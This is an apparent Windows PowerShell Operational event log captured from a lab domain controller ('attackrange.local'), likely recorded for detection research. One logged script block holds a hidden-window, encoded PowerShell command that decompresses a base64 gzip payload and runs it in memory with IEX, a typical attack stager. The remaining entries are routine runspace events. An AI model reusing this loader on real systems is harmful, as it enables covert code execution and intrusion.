ocatwbkk6Du6GfEiteD2YxXx6/toeG6A2HG9+cttz99nQ9mEtKLmMvHWrwrOtomiGBGyYp7/18M/F+5lHnrWdCpoAkW+58+1YvZ4e3k8TJ7Os96b+9XVgbS2Oui/5Une/Nd1/vVAKWZUfxiutANYQg6X2FSEEmnUWYUOAVHrfbx9P1KIp+4MJnC7Hpu/JzrBqgYvn4xBcEoeBzQnuCCm8GS7Xy4qjNvhDBxHX2yks2mHFBOHp7ntDPhly9rcK/xDkSV+DZ9aTCtjG21WsV/t1Wv/D4s/SDMa2/iGsWA9s6S95rcUlP9hH6U+B75BwPwg9L/DW0BXjnjvUFXGvQxXvVK9WulIm+Yd/uxc4AvGLJjbsvci6kZ0attYMHnTnl/1y7NOiOLS+bSZL4zV+AeF7Md+OaJ7KS4zJnjJ9w3JjWdI+M3ZkIQgRH8SgksyFICM1khuhRSEMPevwHbhvBoEw4AAA=="));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

ScriptBlock ID: a896fde2-3b27-4664-b18e-5e775e6e06b6
Path:
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1479326
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1479325
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5264 in AppDomain: DefaultAppDomain.
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1479324
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479323
Keywords=None
Message=Started invocation of ScriptBlock ID: 6a0ec8a0-b6e8-46f0-8404-0ba356433a7d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1479322
Keywords=None
Message=Creating Scriptblock text (1 of 1):
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHIAVABGAGUARgBaAE8ASgBzADUAVwBxAEEAUQBHAEYAQQBGAEgAeABuAFoAdABLAFEAWABkAEwATQBMAHkARQBSAHMAQQA3ADgANwAvAHYAQQBUAFUAMwBzADUAUABaAG4AYQBxADkAVgBsAEUAMgAzAGUAZgA1AE8ANAA4ACsARwBJAFIAZQBHAFQAUgB5AEUATgBVAEMAVABKAGkAcgBPAFkAbABpAEoALwBDAFoAVABxAFYAeQBLAFEAUQB5AFoAZQA2AFkAcgA5AFgASwBKAHYARQBSAEwAYgBhAEwAeABiAE4ATgA2AEgATQBZAEIAZQBqAFoAeABEAGcAaQBjAGMAegA4AFYAYgBrAFkAbQBaAEgAcABNAGIAWABMAHYAUgBrADkAZQB3AEYATwBYAE4ASgBnAHkAcABlAEMAawBPAEEAawBJAHYAVwBMAGkAOABwAEYAdQBaAFgANABzAGIAawBoAHoANwA1AEoAbgBUADEANQA5AGcAaAA5AEMAWABBAE0AaQBtAHEAUABYAEIAZwBLAGcAVwBjADYALwB0AE8AWABMAC8AMABrAGkAbwBoAFAAagArAC8ATgBBAGEARgBjAEgAQgBQAFAAYwBoADAAUwAxACsAcgBNAE4AMgBiAHgAUQBpAEoAeQA5AFcAQgB0AEMAYQBMAE0AWAA4AHoAbABjADMAUABnAEIAcABiAHAAbgBzAGoAeQB2AG8AbABlAHcAQwBIAE8AeAA4AFcAWgBHAGkAQwB6ADgASwBCAHAAaABLADUARABhADkAVQAvAC8ANgB6AFcASAA2AC8AYQBUADAAMQB4AGwANQBoAHUAWABLAHMAYQBlAFUAeQBKADEAOABTAHUAVwA2ADAAegAzACsAdQBGAHcAbQBrAGUAawBsAHAAVgBjADEAQQBVAHgATQBHAEcATgBoAGUATwB6ADMAYQBhAHMAOQBKADYAdgBUAFIAZQBPADkAcABlAHIAWgA4ADgAcwAwAE0AVAAvAFAAaQAxAGsANABYAFUASQAwACsAdABDAHMAcwBSAFkATQBNAGQATQBhAHcAMgBtAE0AZABDADMAKwBQAFQARQAvAFAAMQB6AFoAcABKADQAbABQAEgASQAwADMAWgBwAHkAUQBLAFEAbwBOAEUAZQB3AGUAUgB1AEQAawAwAGYAZQB5AFMAQwBkAGsAQQBXAHoAVwBHADgAUABsADIAdABRADUARwBSAEkAUQBtAGsAYwArAGMAYgBRAEcAKwBmAGYAQgBLAGEAcABkACsANAByAG8ATgBrAFAAdgA0AHUAMwBLAGYAYQBqAHAASgB6ACsARAArAEwAbABQAHQAUABSAE4AUQBqAFcAaABVAGIANQB4AHkANABuAGYAZwAwAE0AcQA4AE8AWQBvAEQAZAAzADYAeQAvAGwAMQB5ADEAZQBIADMAVQA0AEwAVgBLADkAOAByAEgANgBRAHEASgBpADYAeABUAFUAcQBlAEsAZQBEADcATABsAGMAcgBGAHgAZQBQADUAWgBLAEEAUAA3AFYAUgBFAEQAcwBsADMAeAAzAFQAYQBqAEEAYQBHAEcASABTAEkATQBxAEwAYwBFADYAagBoAE4AUwBmAC8AbwA3AFAAVQBlADIAWgBNADIANwA4AFUAbABEADcAegBIAFgAaQBPAFkAYgBuAGEATQBjAGQAOAB6AGcAUABIAFAAeABVAHUAYQBoAFgAVAB0AGwAVAA3AEQAOQBiAGkAZQBOAGkARQBoAFgAbgB2ADYANABHAGcAVwB3AGMAbgB3AGkANQBiADMAbwBPAE8AaQBkADgANwBhAE8AWQBrAFkAMQBMAFMAagB5AGEAWgB6AEkAZAA3AEsAeABWAFQAdwBjAEUAQwB5AGQAMABxAGcAVwBnAGoAegArAHoAaQBaADUARAAzADMAagA1AG8AMwBFAGMAZwByAGoASABZAEIAVwBrAFIAUAAxAEgAWQA0ADQAeAByAEYAVgBsAFgAeQBNAGUANABIAGQAOABoAHoAUwA5ADMARQBDAFoAawBUAFAAMQBxAGIAVAB5AHMALwBiAGkAdgBjAGoAbAB2AG0AdgBHAGMAWQBNAFoASgBWAEQAbgBxAE0ARQBZAHgASABRAEoAYgBqAEMAYwBIAHoAdQBuAEkAeQA2AGgAUQBiAG0AcwAvAG0AMgB1AGwAcgBqAFUAUQBXAFoATQB6ACsASwBlADYAaAA5AEEAZQBsAEwAZABEADMAeQBvAG0AQQBSAEIAZABBAEcARwBxAFIARQBTADUASgBoAHUAZwBVAHEARABHAFQAcQBZADgATABuAGgAMgBHAGMAVABxAGgAOQBpADAAagBkAGQARgAwAG8ATwBKAE8AMABoAEoAcgBCAFQAWQBHAEgAUQBJAG0AYwBpADMAUABqAFAALwBLAGcAMwBEAFUASgBsAEwAMwBTAEoAQgA5AFIAbABGADUASgBjADAANABhAGUAYwA2AHEAbwBNAHQAMQBNAG0AKwBEAHEAZgB6AEgANwBYAEMAZgBIAG8AaQBpAHcATwBvAFAAMAB6AG0AaABJAEEATQBNAE4AYQBJAE8AWgBPAHgARwBGAHYAbABaAHQALwBKAFIANAAvADUAOQA1AFAANwBhAFkASAA4AHoAcwBSACsAUQBVAHkARgBwAFoAaQBJADkAOABUAG8AdAB5AEsAUwBsAFIAYwBiAG4AYwB2AFcARgBaAEkAaABkAFIAUQBFADIASwBBAG8AOAAzAFkAMwBMAFQATgBjAG8AMgBWAHEAdQB5AHQAOABsAE8AegByAFgAdAArAEMAWQBhAGkASAB0AHAAdQBCAHUASwBVADMAagAyADgATABBADcAUwBWAFIAVgBaAFIATAB5AEUAeABXAEoAeQBjAE4AbwAyAEYASQAyADgAdgBoAFcANgBDAFoAcABJAGkAZABUAHYAcwBWAEsATABhAEEANwA3AEEAYgBpAFIAdAA0AC8AQgBLAHQAMgA0AG4AWABiAE8ASgBUADMATwB1AHoARgBuADMAZgBEAFcASgBEADMAQQBqAGYAcwA3AEEATABwAHgAbgBaADYASgB6AGwASAAvAHIARwBWAHQAcQAyAGwATABIADIAMgBCAGwASgAzAE8ASQArAGwAZwBuADQAbwA3ADMAbABwADEAKwA4AEYAcwBQADUARAAzAHYAYwBEAEIAZgBoAHUAYgAwAEsAZgBUADMARwBYAGkATQBvAE4AVwBhAG8AbwBaAGUAawB0AE0AZQAwAHMAdgA1ADkALwBNAGwAcgB0AHcAVAB6AFgAMQBiAGsAWQA2AG8AYQBQAFYAYQBzADkAbABoAFQAOQAwAE0AbgBCAEoALwBEAEwAWQBJAGUAVABGAG8AYgBIAHkATgB6ADIASQBwAGkAaQBYAHIAdwBiAEYAdgA0AFMAWAB0ADAAaABYADEASABrAG8AWgBJAGIAMQA3AFkAagA1ADMAcQBLAFcAcgBTADEAaQB3ADQAdQBPADEAbwBmADgAdAAwAHQAOABPAHQAZAB3AEMAUQB6AGMAbQAzAFMAdgBjAEUAWgBXAGsAbwBwAFcAdQBwAHEAUABsAHoAcABBADkAQwB4AFMAeABaADIAZAA2AGkAcgBRAGMAWgB0ADUAWgB0AEkATQBBAHgAOABNAEsAWgBaADIAMgBpAHYAMwBiADIANQBSAEQAMAAvAEwAZgBVAGIATwBFAHYAeABMAEgANQBRAHAAbgBUAEYAagBrAHkAdgBtACsAZgArAGoAUwBGAHYANQBVAHgARgBJAFoAMAB2AGwAWgB2AEkAegBQAHUAaAA2AGgAQwBMADMAOQBCAEMAcgBxAEsAdQBiAGEAVQBuAHcAbABxAGsAVwBjAHMAdwBKAGoAawBHAHYAZQA1AHcASwB0AHkARABYAHIAKwB2AGEAZQBDAEQAZQBTADIAdABYAGcAawA3AHUAbAAvAG8AQgA4AFQAeQBLAHMAbwBqAEcAZgB3AFkAMwBkADgANABJAFAAdQBXAGEAaQB6AHMAQwAwAE4AOQBKAE0AMQBlAHQANQBLAFgAOQBsAEcANgAzAHEANQA4AHYAUwB1AHgAdgBRAE4AWgB4AGcAcwBwAHAAWQBmAE4ATwBKAGkAdABCAHQAeQA5AEIARABGAFkAZQA2AEcAOQA4AHMAVQBIAE4ATQBTAE8AdABjAEEATwBXAHEAQwBIAGwAZABkAG0AVABYACsAKwBRADgAdAAxAEsAdgBqAFkAUQAwAFAAMABzAEYANgBFACsANwBVAHQARAA4ADMAMABKAGUAbwBiADIAcwBMAGkAbABBAFAAdgA2AEoAMgBaAHUASgA0AEkAbgBpAEoATwBYAHQAdgBMAHcAVgBoAFAAcABwAEoANwBQADIAMwAxACsAZwBLAFAAZABEAEgAVgAxAEwARwBZAFAAYwB4AGEAeQB0AEoANABsAFUAYQBUAEYAMQB1AHcAZgBIADYAMwB0AHIAVwBaAE0ATgBGAFcASABEAHUANQBuADgANgB3AE4AcABjADQAdwBWAG8AaQBRAGIASgBiAHgAbwBEAFQAZABHAHUAeABaAHIAawBPAHYAMABkAGoAYgBRAEoAMAB1AHYAUwBpAHoAYwBUAEoAZQBNAFcAbABiAGIAcgAyAGsAYgBBAGEAOQBEAEkAdQA0ADAAQgArAGEAeQBwAGwAcQA2AGsAMABiAG8AMwBGAE4ARQBqAHUAegAzAFoANQB1AG8ATgBZAGUANwBsAGgAOQBXAHUAUwByAFoAWgA5AFYAdQAvADEAWAB5AGIAMgBpAGcAdABtAFMAeAB0ADcAcABzAGMANwBhAEgAeQBkADQAbwA1AEMAMQB4ADAAbABXADYAZgBYAGoAcgBYAEUATwA3AHcASQBNACsAeAB6AEQANwBpAHoAVABuAEYANgA3AFoAcABlAHoAKwBOAHMASABQAFUASABzAFMASgBuADYANQBqAHoAdABjAEcAcQBvAHgAdwBJAGoALwA5AEEAcgBQAHQAWgBlAGsARQBxAFkAbAB2ADMAMABvAEMAMwBRAFQANwBoAE8AKwB2AGQAYQBxAEIAawBnAHMAKwB6AGcASwBHAC8AOABpAFUAZgBzAEsARwA0AEUANwBaAE4AWAArAG8AZwA3AHAAcABkAHcANQBuAGcAegBYAGQAVwBaADkAWABuAE8ANwBGAHMAcAB2ADkAMABuAEkASwB0ADAAWAB0AFkAMgBFAHYASQB4AFYAZAAzAEMAMwBsADgAZwBKAHgAVwA0AGQAbgBLADcARQBRAGwAWABaAHgAbQBrAEcATwB4AEUAaABTADEAcwBwAFgAMwBZAFkANwB1AEkAeABHAEwAOABaAGEARABkAHoAUwBjAHEANQBxADEAMgBLAFgANAAwAEEAawBUAGYAWABsAHQAMgBxADkAeQAwAG8AYwBhAHQAdwBiAGsAawA2AEQAdQA2AEcAZgBFAGkAdABlAEQAMgBZAHgAWAB4ADYALwB0AG8AZQBHADYAQQAyAEgARwA5ACsAYwB0AHQAegA5ADkAbgBRADkAbQBFAHQASwBMAG0ATQB2AEgAVwByAHcAcgBPAHQAbwBtAGkARwBCAEcAeQBZAHAANwAvADEAOABNAC8ARgArADUAbABIAG4AcgBXAGQAQwBwAG8AQQBrAFcAKwA1ADgAKwAxAFkAdgBaADQAZQAzAGsAOABUAEoANwBPAHMAOQA2AGIAKwA5AFgAVgBnAGIAUwAyAE8AdQBpAC8ANQBVAG4AZQAvAE4AZAAxAC8AdgBWAEEASwBXAFoAVQBmAHgAaQB1AHQAQQBOAFkAUQBnADYAWAAyAEYAUwBFAEUAbQBuAFUAVwBZAFUATwBBAFYASAByAGYAYgB4ADkAUAAxAEsASQBwACsANABNAEoAbgBDADcASABwAHUALwBKAHoAcgBCAHEAZwBZAHYAbgA0AHgAQgBjAEUAbwBlAEIAegBRAG4AdQBDAEMAbQA4AEcAUwA3AFgAeQA0AHEAagBOAHYAaABEAEIAeABIAFgAMgB5AGsAcwAyAG0ASABGAEIATwBIAHAANwBuAHQARABQAGgAbAB5ADkAcgBjAEsALwB4AEQAawBTAFYAKwBEAFoAOQBhAFQAQwB0AGoARwAyADEAVwBzAFYALwB0ADEAVwB2AC8ARAA0AHMALwBTAEQATQBhADIALwBpAEcAcwBXAEEAOQBzADYAUwA5ADUAcgBjAFUAbABQADkAaABIADYAVQArAEIANwA1AEIAdwBQAHcAZwA5AEwALwBEAFcAMABCAFgAagBuAGoAdgBVAEYAWABHAHYAUQB4AFgAdgBWAEsAOQBXAHUAbABJAG0AKwBZAGQALwB1AHgAYwA0AEEAdgBHAEwASgBqAGIAcwB2AGMAaQA2AGsAWgAwAGEAdAB0AFkATQBIAG4AVABuAGwALwAxAHkANwBOAE8AaQBPAEwAUwArAGIAUwBaAEwANAB6AFYAKwBBAGUARgA3AE0AZAArAE8AYQBKADcASwBTADQAegBKAG4AagBKADkAdwAzAEoAagBXAGQASQArAE0AMwBaAGsASQBRAGcAUgBIADgAUwBnAGsAcwB5AEYASQBDAE0AMQBrAGgAdQBoAFIAUwBFAE0AUABlAHYAdwBIAGIAaAB2AEIAbwBFAHcANABBAEEAQQA9AD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=

ScriptBlock ID: 6a0ec8a0-b6e8-46f0-8404-0ba356433a7d
Path:
06/15/2021 05:09:40 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479321
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1479345
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8197
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Connect
OpCode=Open (async)
RecordNumber=1479344
Keywords=None
Message=Runspace state changed to Opening
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8195
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Connect
OpCode=Open (async)
RecordNumber=1479343
Keywords=None
Message=Opening RunspacePool
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8194
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Connect
OpCode=to be used when an object is constructed
RecordNumber=1479342
Keywords=None
Message=Creating RunspacePool object 
 	 InstanceId ed0cb4e8-66e5-44d3-b801-8ea2978e3310 
 	 MinRunspaces 1 
 	 MaxRunspaces 1
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=8193
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Connect
OpCode=to be used when an object is constructed
RecordNumber=1479341
Keywords=None
Message=Creating Runspace object 
 	 Instance Id: 7c64d31b-8ed5-412a-8a9f-31556d36620e
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479340
Keywords=None
Message=Completed invocation of ScriptBlock ID: 6f0d6322-ac66-4702-8f7e-ec28c1c4bd2d
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479339
Keywords=None
Message=Started invocation of ScriptBlock ID: 6f0d6322-ac66-4702-8f7e-ec28c1c4bd2d
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479338
Keywords=None
Message=Completed invocation of ScriptBlock ID: 409422e4-2a33-49dd-93e0-d62dfac8bbad
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:41 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479337
Keywords=None
Message=Started invocation of ScriptBlock ID: 409422e4-2a33-49dd-93e0-d62dfac8bbad
Runspace ID: df859e17-4b24-400f-9b27-21ca1430cacf
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479403
Keywords=None
Message=Completed invocation of ScriptBlock ID: b8bb59f0-2a61-40c9-8c37-53741cfac6c1
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479402
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479401
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479400
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479399
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479398
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479397
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479396
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479395
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479394
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479393
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479392
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479391
Keywords=None
Message=Started invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479390
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54af5a29-7a51-479b-852c-d2bba7e752fc
Runspace ID: 371b04eb-e0ff-4e83-bdd4-669a02c68000
06/15/2021 05:09:42 PM
LogName=Microsoft-Windows-PowerShell/Operational
